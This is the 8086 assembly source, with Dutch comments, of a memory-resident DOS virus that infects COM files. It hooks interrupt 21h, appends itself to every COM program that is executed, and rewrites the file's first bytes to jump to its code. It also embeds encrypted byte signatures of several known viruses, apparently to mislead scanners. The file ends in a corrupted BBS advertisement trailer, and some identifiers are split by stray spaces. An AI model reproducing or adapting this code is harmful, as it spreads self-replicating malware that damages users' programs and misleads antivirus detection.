2022-08-21 09:07:57 +00:00
;****************************************************************************
;* stripped COM-versie
;* met signature's
;*
;****************************************************************************
cseg seg ment
assume cs : cs eg , ds : cs eg , es : nothing
org 100h
SIGNLEN equ si gnend - si gnature
FILELEN equ eind - begin
RESPAR equ ( FILELEN / 16 ) + 17
BUFLEN equ 08h
VERSION equ 4
.RADIX 16
;****************************************************************************
;* Opstart programma
;****************************************************************************
begin: xor bx , bx
mov cl , 07h
crloop: call crypt
loop crloop
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup ( ? )
oi21 dw ? , ?
oldlen dw ?
handle dw ?
sign db 0
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax , 4B00h
jne ni_verder
push es
push ds
push ax
push bx
push cx
push dx
call attach
mov cl ,[ si gn ]
call crypt
inc cl
and cl , 07h
mov [ si gn ], cl
call crypt
pop dx
pop cx
pop bx
pop ax
pop ds
pop es
exit: popf
jmp dword ptr cs :[ oi21 ] ;naar oude int-handler
ni_verder: cmp ax , 0DADAh
jne exit
mov ax , 0A500h + VERSION
popf
iret
;****************************************************************************
;* plakt programma aan file (ASCIIZ DS:DX)
;****************************************************************************
attach: cld
mov ax , 3D02h ;open de file
int 21
jc finnish
push cs
pop ds
mov [ handle ], ax ;bewaar file-handle
call eindptr ;bepaal lengte
jc finnish
mov [ oldlen ], ax
sub ax , SI GNLEN ;pointer naar eind - SIGNLEN
sbb dx , 0
mov cx , dx
mov dx , ax
mov al , 00h
call ptrmov
jc finnish
mov cx , SI GNLEN ;lees de laatse bytes
mov dx , offset buffer
call flread
jc finnish
verder3: push cs ;vergelijk signature met buffer
pop es
mov di , offset buffer
mov si , offset si gnature
mov cx , SI GNLEN
rep cmpsb
or cx , cx
jz finnish
call beginptr ;lees begin van file
mov cx , BUFLEN
mov dx , offset buffer
call flread
jc finnish
cmp word ptr [ buffer ], 5A4Dh
jz finnish
call writeprog ;schrijf programma naar file
jc finnish
mov ax ,[ oldlen ] ;bereken call-adres
add ax , offset entry
sub ax , 0103
mov byte ptr [ buffer ], 0E9h
mov word ptr [ buffer + 1 ], ax
call beginptr ;pas begin van file aan
mov cx , BUFLEN
mov dx , offset buffer
call flwrite
jc finnish
finnish: mov bx ,[ handle ] ;sluit de file
mov ah , 3Eh
int 21
ret
;****************************************************************************
;* Crypt een signature
;****************************************************************************
crypt: push cx
mov al , 14h
mul cl
add ax , offset virsig
mov si , ax
mov di , ax
push cs
push cs
pop ds
pop es
mov cx , 0Ah
cryploop: lodsw
xor ax , 0FFFFh
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Schrijf programma naar file
;****************************************************************************
writeprog: call eindptr
mov cx , FILELEN
mov dx , offset begin
call flwrite
ret
;****************************************************************************
;* Subroutines voor file-pointer
;****************************************************************************
beginptr: mov al , 00h ;naar begin van de file
xor cx , cx
xor dx , dx
jmp ptrmov
eindptr: mov al , 02h ;naar eind van de file
xor cx , cx
xor dx , dx
; jmp ptrmov
ptrmov: mov ah , 42h
mov bx ,[ handle ]
int 21
ret
;****************************************************************************
;* Subroutines voor lezen/schrijven
;****************************************************************************
flwrite: push cs
pop ds
mov ah , 40h
mov bx ,[ handle ]
int 21
ret
flread: push cs
pop ds
mov ah , 3Fh
mov bx ,[ handle ]
int 21
ret
;****************************************************************************
;* Activering vanuit file
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx , offset entry2 ;CS:BX is begin programma - 100
cld
mov ax , bx ;copieer oude begin terug
add ax , offset buffer
mov si , ax
mov di , 0100
mov cx , BUFLEN
rep movsb
mov ax , 0100h
push ax
entcall: mov ax , 0DADAh ;kijk of al geinstalleerd
int 21h
cmp ah , 0A5h
je entstop
call install ;installeer het programma
entstop: ret
;****************************************************************************
;* Installatie in het geheugen
;****************************************************************************
install: push ds
push es
xor ax , ax ;haal oude vector
mov es , ax
mov cx , word ptr es : 0084h
mov dx , word ptr es : 0086h
mov [ bx + offset oi21 ], cx
mov [ bx + offset oi21 + 2 ], dx
mov ax , ds ;pas geheugen-grootte aan
dec ax
mov es , ax
cmp byte ptr es :[ 0000h ], 5Ah
jnz cancel
mov ax , es :[ 0003h ]
sub ax , RESPAR
jb cancel
mov es :[ 0003h ], ax
sub es :[ 0012h ], word ptr RESPAR
mov es , es :[ 0012h ] ;copieer programma naar top
mov ax , bx
add ax , 0100
mov si , ax
mov di , 0100h
mov cx , FILELEN
rep movsb
mov dx , offset ni21 ;zet nieuwe vector
push es
pop ds
mov ax , 2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Tekst en Signature
;****************************************************************************
virsig:
;SYSLOCK Virus
db 0D1h , 0E9h , 8Ah , 0E1h
db 8Ah , 0C1h , 33h , 06h
db 14h , 00h , 31h , 04h
db 46h , 46h , 0E2h , 0F2h
db 5Eh , 59h , 58h , 0C3h
;Sylvia Virus
db 8Dh , 36h , 03h , 01h
db 33h , 0C9h , 33h , 0C0h
db 0ACh , 3Ch , 1Ah , 74h
db 04h , 90h , 90h , 90h
db 90h , 90h , 90h , 90h
;DATACRIME IIb Virus
db 2Eh , 8Ah , 07h , 32h
db 0C2h , 0D0h , 0CAh , 2Eh
db 88h , 07h , 43h , 0E2h
db 0F3h , 90h , 90h , 90h
db 90h , 90h , 90h , 90h
;Yankee-Go-Home Virus (Enigma)
db 0D8h , 0Eh , 1Fh , 0BEh
db 37h , 08h , 81h , 0EEh
db 03h , 01h , 03h , 0F3h
db 89h , 04h , 0BEh , 39h
db 08h , 81h , 0EEh , 03h
;Slowdown Virus
db 0DEh , 90h , 90h , 81h
db 0C6h , 1Bh , 00h , 0B9h
db 90h , 06h , 2Eh , 80h
db 34h , 90h , 90h , 90h
db 90h , 90h , 90h , 90h
;Scotts Valley Virus
db 5Eh , 8Bh , 0DEh , 90h
db 90h , 81h , 0C6h , 32h
db 00h , 0B9h , 12h , 08h
db 2Eh , 90h , 90h , 90h
db 90h , 90h , 90h , 90h
;Tiny-2A related Virus
db 0A5h , 8Eh , 0C1h , 0A6h
db 74h , 12h , 4Eh , 4Fh
db 0F3h , 0A5h , 8Eh , 0C1h
db 93h , 91h , 91h , 26h
db 87h , 85h , 0E0h , 0FEh
;DATACRIME 1280 Virus
db 8Bh , 36h , 01h , 01h
db 83h , 0EEh , 03h , 8Bh
db 0C6h , 3Dh , 00h , 00h
db 75h , 03h , 0E9h , 02h
db 01h , 90h , 90h , 90h
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h
signature: db 'GOTCHA!' , 0
signend:
eind:
cseg ends
end begin
�
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > and Remember Don't Forget to Call <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
